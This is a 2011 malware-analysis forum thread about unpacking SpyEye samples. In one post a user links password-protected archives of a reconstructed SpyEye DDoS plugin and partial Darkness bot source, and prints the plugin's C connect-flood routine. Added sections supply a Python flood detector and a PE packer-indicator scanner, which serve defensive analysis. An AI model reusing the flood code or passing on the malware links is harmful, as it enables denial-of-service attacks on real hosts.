A forum for reverse engineering, OS internals and malware analysis 

 #7140  by USForce
 Fri Jul 08, 2011 10:33 am
EP_X0FF wrote: A surprise? Quite primitive.
Yeah, let me say that SpyEye has become pretty trivial to unpack and decode. I'd say it's almost boring :D
 #7144  by cronos713
 Fri Jul 08, 2011 1:52 pm
Hi EP_X0FF, thank you very much. Yes, this is quite primitive, about six months ago.
USForce, do you have some script for this?
 #7146  by EP_X0FF
 Fri Jul 08, 2011 2:09 pm
It can't be so old (6 months). Maybe 1.5 or 2-3. What scripts? For this skiddie crypter bpx NtWriteVirtualMemory - decryption done.
 #7151  by cronos713
 Fri Jul 08, 2011 3:54 pm
Thanks! Yes, maybe more recent. I mean a script that automates the task of the genre .zip + the pass [md5]
The following shows what is new
Attachments
pass: infected
 #7152  by EP_X0FF
 Fri Jul 08, 2011 4:06 pm
It's the same. Just recrypted.
 #7210  by kmd
 Mon Jul 11, 2011 1:02 pm
someone fully reconstructed ddos plug of spyeye shi.. i mean kit xD

http://demonteam.narod.ru/download/P1.rar. PASS: 666
```c
void cmd_ssyn(LPSTR host, u_short port, DWORD second)
{
	WSADATA wsadata;
	SOCKADDR_IN sin;
	u_long mode = 1;
	SOCKET s;
	SOCKET ss[100];
	
	if(WSAStartup(MAKEWORD(2, 0/*!? 2*/), &wsadata))
	{
		DWORD inetaddr = resolve(host);
		sin.sin_family = AF_INET;
		sin.sin_port = htons(port);
		sin.sin_addr.s_addr = inetaddr;
		
		int st = GetTickCount(); // start time
		while(GetTickCount()-st <= second*1000) // timeout
		{
			for(int i=0; i < 100; i++)
			{
				if(Stop) break;
				s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
				ss[i] = s;
				if(s != INVALID_SOCKET)
				{
					ioctlsocket(s, FIONBIO, &mode);
				}
			}
			for(int i=0; i < 100; i++)
			{
				connect(ss[i], (SOCKADDR*)&sin, sizeof(sin));
			}
			Sleep(100);
			for(int i=0; i < 100; i++)
			{
				closesocket(ss[i]);
			}
		}
	}
}
```
+ Darkness bot partial source

http://demonteam.narod.ru/download/P2.rar. PASS: 666
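The reconstructed routine above has a very recognisable network footprint: a single source opens a batch of 100 non-blocking sockets to one host:port, fires the connects, sleeps 100 ms, closes everything and repeats until its timer expires. The following is an added detection example (not code from the thread or from the kit) that looks for exactly that shape in flow records. The log format, the sample records and the thresholds are all constructed for the example; map `parse_line` onto whatever your firewall or NetFlow export actually produces.

```python
"""Flag connect-flood bursts: many short-lived TCP connections from one source
to one host:port inside a short window.  Added example; the record format
"<ts_ms> <src_ip> <dst_ip> <dst_port> <duration_ms>" is a constructed one."""
from collections import defaultdict
from statistics import median


def build_sample_log():
    """Constructed sample: 10.0.0.5 opens 100 connections every 100 ms to
    203.0.113.10:80 and drops each after ~100 ms (10 batches, ~1 s total);
    10.0.0.9 makes a few ordinary long-lived connections to the same host."""
    lines = []
    ts = 0
    for _batch in range(10):
        for _ in range(100):
            lines.append(f"{ts} 10.0.0.5 203.0.113.10 80 100")
        ts += 100
    lines += [
        "50 10.0.0.9 203.0.113.10 80 8000",
        "400 10.0.0.9 203.0.113.10 443 12000",
        "900 10.0.0.9 203.0.113.10 80 6500",
    ]
    return lines


def parse_line(line):
    ts, src, dst, port, dur = line.split()
    return {"ts": int(ts), "src": src, "dst": dst, "port": int(port), "dur": int(dur)}


def detect_connect_floods(records, window_ms=1000, min_attempts=50, max_dur_ms=200):
    """Group flows by (src, dst, port), slide a window_ms window over each
    group's start times, and raise an alert for the densest window if it holds
    at least min_attempts connections whose median lifetime is <= max_dur_ms.
    The short lifetime is what separates the open/connect/close loop above from
    a legitimately busy client."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["src"], r["dst"], r["port"])].append(r)

    alerts = []
    for key, flows in by_key.items():
        flows.sort(key=lambda r: r["ts"])
        start, best = 0, None
        for end in range(len(flows)):
            # advance the window start until the window spans <= window_ms
            while flows[end]["ts"] - flows[start]["ts"] > window_ms:
                start += 1
            count = end - start + 1
            if count >= min_attempts and (best is None or count > best[0]):
                best = (count, start, end)
        if best is None:
            continue
        count, start, end = best
        durs = [f["dur"] for f in flows[start:end + 1]]
        if median(durs) <= max_dur_ms:
            alerts.append({
                "src": key[0], "dst": key[1], "port": key[2],
                "attempts": count, "window_start": flows[start]["ts"],
                "median_dur_ms": median(durs),
            })
    return alerts


def run_sample():
    return detect_connect_floods([parse_line(l) for l in build_sample_log()])


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the constructed sample only 10.0.0.5 is reported (1000 attempts in one window, median lifetime 100 ms); the three long-lived flows from 10.0.0.9 never reach the attempt threshold. The alert keys on src/dst/port rather than src alone so a single noisy client hitting many services is not mistaken for a flood against one.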
 #7216  by pigindrin
 Mon Jul 11, 2011 4:02 pm
Hi, could anyone help me and post a "how to" to unpack and decode SpyEye samples? It would be great to analyze them. I know that for USForce it is trivial, but if you could give me a hand, I'll appreciate it.
 #7217  by EP_X0FF
 Mon Jul 11, 2011 4:32 pm
Everything becomes trivial when you do this a few thousand times. No manual for "unpacking" SpyEye since there is nothing to unpack except UPX or PECompact. They are using several different crypters in combination with packers, which I highlighted before. So you need to know in general how to debug and reverse programs and malware. About your second question, refer to page #10 where I posted the decoder. Slightly modified, it will work for all available bot versions including old v1.2
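Before reaching for a debugger, a first triage step is to read the PE section table and see whether a sample carries the marks of a stock packer such as the UPX or PECompact mentioned above. The following is an added example, not the decoder referred to in the thread and not anyone's tool: it parses the section headers from raw bytes and reports the generic indicators (a known packer section name, a section with no raw data but a large virtual size, a section mapped readable+writable+executable). The UPX section names are the ones UPX really emits; the PECompact names in the table are an assumption for illustration, and the two PE images are constructed in memory so the script runs offline.

```python
"""Section-table packer indicators for a PE image.  Added example; the
section-name table is partial and the PECompact entries are assumed names."""
import struct

SECTION_FMT = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes
SCN_RWX = 0xE0000000                  # MEM_EXECUTE | MEM_READ | MEM_WRITE

KNOWN_PACKER_SECTIONS = {
    "UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX", ".UPX0": "UPX", ".UPX1": "UPX",
    # assumed names for PECompact, included for illustration only
    "PEC2": "PECompact (assumed)", "pec1": "PECompact (assumed)", "pec2": "PECompact (assumed)",
}


def build_pe(sections):
    """Construct a minimal PE32 image: DOS stub, PE signature, COFF header,
    zeroed optional header and the given section headers (no section data)."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)               # e_lfanew
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    hdrs = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, va, rsize, raw, 0, 0, 0, 0, chars)
        for name, vsize, va, rsize, raw, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


def parse_sections(data):
    """Walk the section table; raises ValueError on a non-PE input."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    off = e_lfanew + 24 + opt_size                      # first section header
    out = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, off + 40 * i)
        out.append({"name": f[0].rstrip(b"\0").decode("latin-1"),
                    "vsize": f[1], "rsize": f[3], "chars": f[9]})
    return out


def packer_indicators(sections):
    hits = []
    for s in sections:
        if s["name"] in KNOWN_PACKER_SECTIONS:
            hits.append(f"section name {s['name']!r} ({KNOWN_PACKER_SECTIONS[s['name']]})")
        if s["rsize"] == 0 and s["vsize"] >= 0x1000:
            hits.append(f"section {s['name']!r} has no raw data but {s['vsize']:#x} bytes virtual (unpack target)")
        if (s["chars"] & SCN_RWX) == SCN_RWX:            # parenthesised: == binds tighter than &
            hits.append(f"section {s['name']!r} is readable, writable and executable")
    return hits


# Constructed images: a UPX-style layout and a plain compiler layout.
UPX_STYLE = build_pe([
    (b"UPX0", 0x20000, 0x1000, 0, 0, 0xE0000080),
    (b"UPX1", 0x8000, 0x21000, 0x7800, 0x400, 0xE0000040),
    (b".rsrc", 0x1000, 0x29000, 0x800, 0x7C00, 0xC0000040),
])
PLAIN = build_pe([
    (b".text", 0x5000, 0x1000, 0x5000, 0x400, 0x60000020),
    (b".data", 0x1000, 0x6000, 0x400, 0x5400, 0xC0000040),
])


def scan(data):
    return packer_indicators(parse_sections(data))


if __name__ == "__main__":
    for label, img in (("upx-style", UPX_STYLE), ("plain", PLAIN)):
        print(label, scan(img) or "no packer indicators")
```

The UPX-style image trips five indicators (two known names, the empty UPX0 unpack target, and two RWX sections); the plain image trips none. A clean section table proves nothing on its own, since a crypter can name its sections anything, but a hit tells you which stock unpacker to try before spending time in a debugger.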